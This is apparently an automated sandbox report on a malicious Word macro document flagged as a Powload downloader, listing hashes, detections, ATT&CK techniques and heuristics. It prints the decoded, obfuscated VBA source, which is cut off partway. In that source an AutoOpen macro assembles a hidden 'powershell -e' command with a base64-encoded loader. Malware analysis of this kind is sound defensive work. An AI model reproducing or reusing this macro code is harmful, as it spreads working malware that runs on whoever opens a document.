Office (OLE) malware analysis — malicious · 0da2937ce8a3abe5

MALICIOUS

Office (OLE)

116.0 KB Created: 2018-06-08 06:54:00 Authoring application: Microsoft Office Word First seen: 2018-09-04

MD5: 74b7937d9dde45f0074f84a9b498f78a SHA-1: 1277e5b4de10821cd4639c7b7d8432c63eef80bf SHA-256: 0da2937ce8a3abe5aea37dd08b2e0d20e384dfa9fbdaa322cd65c554bbfe245f

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The Autoopen macro triggers the execution of the YoJHG function, which in turn calls the Shell() function. This function is used to execute a command, likely to download and run a second-stage payload, as indicated by the ClamAV detection name 'Doc.Malware.Powload-7012660-0'. The presence of legacy WordBasic markers and the Shell() call in VBA strongly suggest a malicious intent to execute arbitrary commands.

Heuristics 7

ClamAV: Doc.Malware.Powload-7012660-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Powload-7012660-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13923 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13923 bytes
SHA-256: `f595a0e6520d7b1e9ba602a6fa407416a7aacdce3bfcd984e422038fbc9a3213`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "nsjOpfSA" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function YoJHG() On Error Resume Next For cZpjS = wLfKGt To QrjfUz For sKHiA = itQds To 91085 dVYGGN = (98926 / CBool(JVBuv) - qKHFp / Oct(75566 / Hex(73577) / SSKfF + Rnd(FuBSL / Fix(37)))) Next SvTdZ = 14792 - 96909 Next For ioGkF = ojIYCI To MDFva For oNOTj = sEvrif To 64914 jidMaa = (30569 / CBool(VmdPD) - FrNhzA / Oct(18272 / Hex(78461) / UWBMl + Rnd(rdtUTU / Fix(37)))) Next ZtVzrS = 84777 - 54228 Next YoJHG = PsiaFmV + Shell(GmJrLX + Chr(krzbpA + vbKeyP + lqJOzQ) + "owers" + vavKf + uzlGj + SjuitMHdW + mQPYDhtV + qEzEMku + zzkROT, 15298 - 15298) For TfuwDd = jhfuNI To YNiddI For ukdbSU = zIqws To 58576 WSmpO = (62484 / CBool(nnaQQ) - zmNpO / Oct(37918 / Hex(12644) / vQXkI + Rnd(jYowVi / Fix(37)))) Next CurnPb = 44253 - 13567 Next End Function Sub Autoopen() On Error Resume Next For DKBRON = BiYXda To PEGuj For zcumR = rVBzrj To 35101 MMjrXT = (56167 / CBool(PzGIbs) - iIhqsz / Oct(53031 / Hex(31789) / zTWZz + Rnd(joLbpC / Fix(37)))) Next OXMlM = 24167 - 94325 Next YoJHG For ISwtSq = sZClw To rDzDm For QSzADZ = tJiGk To 28871 jrBXj = (63890 / CBool(WvlZEG) - XUPiZ / Oct(62341 / Hex(62230) / LSvTF + Rnd(AOTRWc / Fix(37)))) Next ACZWFn = 89199 - 43109 Next End Sub Attribute VB_Name = "bwTLWpOY" Function vavKf() On Error Resume Next For dICLq = OZlvA To WfBBBr For NwmFD = PVciUv To 25666 uhPhSZ = (37697 / CBool(dwdhSi) - fEbUk / Oct(51965 / Hex(24235) / DwUaCm + Rnd(QAmBbw / Fix(37)))) Next TiSwiS = 77685 - 52977 Next UActTXViAj = "HeLL -e KAAgA" + "G4AZ" + "QB3AC0ATwBiAG" + "oARQ" + "BDAHQAIAAgAHMAe" For YlNwi = bcTiqL To wwQwmh For uRCKsk = BowtCb To 53368 pppMWZ = (20073 / CBool(tIbkjU) - hfGwcH / Oct(66209 / Hex(5890) / tBZnW + Rnd(njHCIb / Fix(37)))) Next aKDjj = 18080 - 3537 Next UwYrkJRk = "QBTAFQA" + "ZQBtAC4AaQBv" + "AC4AYwBPA" + "E0AUABy" + "AEUA" + "UwBTAEkATwBOA" + "C4AZABFAEYAT" + "AB" For zIjJP = vdzoH To lSVAWK For UrdhL = aFvus To 45133 Bltss = (59232 / CBool(arGIO) - pVIpD / Oct(25538 / Hex(47682) / jaWbV + Rnd(oJAiG / Fix(37)))) Next ilAYc = 14205 - 84073 Next zFFtsvok = "BAHQARQBz" + "AFQAcgBlAE" + "EAbQAoA" + "CA" For fdlVS = OFwGr To wUULXR For ZSQrX = zTDVj To 24126 VVZDpB = (16503 / CBool(qjMtr) - SNQoAL / Oct(69497 / Hex(34851) / OmOTVp + Rnd(jNtvJ / Fix(37)))) Next vRWWIL = 67732 - 67304 Next nbcQzZujuK = "AWwBz" + "AFkAUwBUAGUA" + "bQAuAEkAbwAuAG" + "0A" + "RQBt" + "AE" For zfbiG = jiALDk To QbhmV For zzzwQp = zSiDY To 67118 Joisq = (67832 / CBool(DitjG) - kAvoVp / Oct(7223 / Hex(67781) / zjKpo + Rnd(NEznUj / Fix(37)))) Next cspwm = 14740 - 92735 Next wmojz = "8AcgB5AHM" + "AdAByAGUAYQ" + "BNAF0AIABbAEMA" + "TwBuAHY" For GMKwh = XqhifS To qwiBu For pavvmJ = YCzZDw To 75045 rWAtGo = (81508 / CBool(PEpQw) - uHusXG / Oct(89380 / Hex(20519) / YnzaV + Rnd(IfjfSz / Fix(37)))) Next hInwzM = 61613 - 83594 Next uzuNScm = "ARQByAHQAXQ" + "A6" + "ADoAZgB" + "yAG" + "8ATQ" + "BiAGE" vavKf = UActTXViAj + UwYrkJRk + zFFtsvok + nbcQzZujuK + wmojz + uzuNScm End Function Function uzlGj() On Error Resume Next For sjnHri = YjqjF To FHNVWH For GlfmS = mEbHh To 58906 buPnN = (99195 / CBool(UKwcSV) - Cjiiq / Oct(46841 / Hex(36368) / HEBoSs + Rnd(zZICj / Fix(37)))) Next LrZHW = 58467 - 7175 Next LrqUMSv = "AUwBlADY" + "ANABzAHQAUgBJAG" + "4A" + "RwAoACcAVgB" + "aAEI" + "AdAB" + "TADgATQB3AEY" + "ASQBY" + "AC8AUwBqADQA" + "VQB1A" For mDTzTk = sdrGG To mLmYhl For MZTQp = qoIWT To 88374 uVBhr = (96941 / CBool(iEwQv) - PYjnj / Oct(79641 / Hex(86781) / jMjDHO + Rnd(jjGYMr / Fix(37)))) Next RKFjjd = 61468 - 15080 Next ... (truncated)

SHA-256: f595a0e6520d7b1e9ba602a6fa407416a7aacdce3bfcd984e422038fbc9a3213

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "nsjOpfSA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function YoJHG()
On Error Resume Next
For cZpjS = wLfKGt To QrjfUz
      For sKHiA = itQds To 91085
         dVYGGN = (98926 / CBool(JVBuv) - qKHFp / Oct(75566 / Hex(73577) / SSKfF + Rnd(FuBSL / Fix(37))))
Next
   SvTdZ = 14792 - 96909
Next
For ioGkF = ojIYCI To MDFva
      For oNOTj = sEvrif To 64914
         jidMaa = (30569 / CBool(VmdPD) - FrNhzA / Oct(18272 / Hex(78461) / UWBMl + Rnd(rdtUTU / Fix(37))))
Next
   ZtVzrS = 84777 - 54228
Next
YoJHG = PsiaFmV + Shell(GmJrLX + Chr(krzbpA + vbKeyP + lqJOzQ) + "owers" + vavKf + uzlGj + SjuitMHdW + mQPYDhtV + qEzEMku + zzkROT, 15298 - 15298)
For TfuwDd = jhfuNI To YNiddI
      For ukdbSU = zIqws To 58576
         WSmpO = (62484 / CBool(nnaQQ) - zmNpO / Oct(37918 / Hex(12644) / vQXkI + Rnd(jYowVi / Fix(37))))
Next
   CurnPb = 44253 - 13567
Next
End Function
Sub Autoopen()
On Error Resume Next
For DKBRON = BiYXda To PEGuj
      For zcumR = rVBzrj To 35101
         MMjrXT = (56167 / CBool(PzGIbs) - iIhqsz / Oct(53031 / Hex(31789) / zTWZz + Rnd(joLbpC / Fix(37))))
Next
   OXMlM = 24167 - 94325
Next
YoJHG
For ISwtSq = sZClw To rDzDm
      For QSzADZ = tJiGk To 28871
         jrBXj = (63890 / CBool(WvlZEG) - XUPiZ / Oct(62341 / Hex(62230) / LSvTF + Rnd(AOTRWc / Fix(37))))
Next
   ACZWFn = 89199 - 43109
Next
End Sub


Attribute VB_Name = "bwTLWpOY"
Function vavKf()
On Error Resume Next
For dICLq = OZlvA To WfBBBr
      For NwmFD = PVciUv To 25666
         uhPhSZ = (37697 / CBool(dwdhSi) - fEbUk / Oct(51965 / Hex(24235) / DwUaCm + Rnd(QAmBbw / Fix(37))))
Next
   TiSwiS = 77685 - 52977
Next
UActTXViAj = "HeLL -e KAAgA" + "G4AZ" + "QB3AC0ATwBiAG" + "oARQ" + "BDAHQAIAAgAHMAe"
For YlNwi = bcTiqL To wwQwmh
      For uRCKsk = BowtCb To 53368
         pppMWZ = (20073 / CBool(tIbkjU) - hfGwcH / Oct(66209 / Hex(5890) / tBZnW + Rnd(njHCIb / Fix(37))))
Next
   aKDjj = 18080 - 3537
Next
UwYrkJRk = "QBTAFQA" + "ZQBtAC4AaQBv" + "AC4AYwBPA" + "E0AUABy" + "AEUA" + "UwBTAEkATwBOA" + "C4AZABFAEYAT" + "AB"
For zIjJP = vdzoH To lSVAWK
      For UrdhL = aFvus To 45133
         Bltss = (59232 / CBool(arGIO) - pVIpD / Oct(25538 / Hex(47682) / jaWbV + Rnd(oJAiG / Fix(37))))
Next
   ilAYc = 14205 - 84073
Next
zFFtsvok = "BAHQARQBz" + "AFQAcgBlAE" + "EAbQAoA" + "CA"
For fdlVS = OFwGr To wUULXR
      For ZSQrX = zTDVj To 24126
         VVZDpB = (16503 / CBool(qjMtr) - SNQoAL / Oct(69497 / Hex(34851) / OmOTVp + Rnd(jNtvJ / Fix(37))))
Next
   vRWWIL = 67732 - 67304
Next
nbcQzZujuK = "AWwBz" + "AFkAUwBUAGUA" + "bQAuAEkAbwAuAG" + "0A" + "RQBt" + "AE"
For zfbiG = jiALDk To QbhmV
      For zzzwQp = zSiDY To 67118
         Joisq = (67832 / CBool(DitjG) - kAvoVp / Oct(7223 / Hex(67781) / zjKpo + Rnd(NEznUj / Fix(37))))
Next
   cspwm = 14740 - 92735
Next
wmojz = "8AcgB5AHM" + "AdAByAGUAYQ" + "BNAF0AIABbAEMA" + "TwBuAHY"
For GMKwh = XqhifS To qwiBu
      For pavvmJ = YCzZDw To 75045
         rWAtGo = (81508 / CBool(PEpQw) - uHusXG / Oct(89380 / Hex(20519) / YnzaV + Rnd(IfjfSz / Fix(37))))
Next
   hInwzM = 61613 - 83594
Next
uzuNScm = "ARQByAHQAXQ" + "A6" + "ADoAZgB" + "yAG" + "8ATQ" + "BiAGE"
vavKf = UActTXViAj + UwYrkJRk + zFFtsvok + nbcQzZujuK + wmojz + uzuNScm
End Function
Function uzlGj()
On Error Resume Next
For sjnHri = YjqjF To FHNVWH
      For GlfmS = mEbHh To 58906
         buPnN = (99195 / CBool(UKwcSV) - Cjiiq / Oct(46841 / Hex(36368) / HEBoSs + Rnd(zZICj / Fix(37))))
Next
   LrZHW = 58467 - 7175
Next
LrqUMSv = "AUwBlADY" + "ANABzAHQAUgBJAG" + "4A" + "RwAoACcAVgB" + "aAEI" + "AdAB" + "TADgATQB3AEY" + "ASQBY" + "AC8AUwBqADQA" + "VQB1A"
For mDTzTk = sdrGG To mLmYhl
      For MZTQp = qoIWT To 88374
         uVBhr = (96941 / CBool(iEwQv) - PYjnj / Oct(79641 / Hex(86781) / jMjDHO + Rnd(jjGYMr / Fix(37))))
Next
   RKFjjd = 61468 - 15080
Next
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.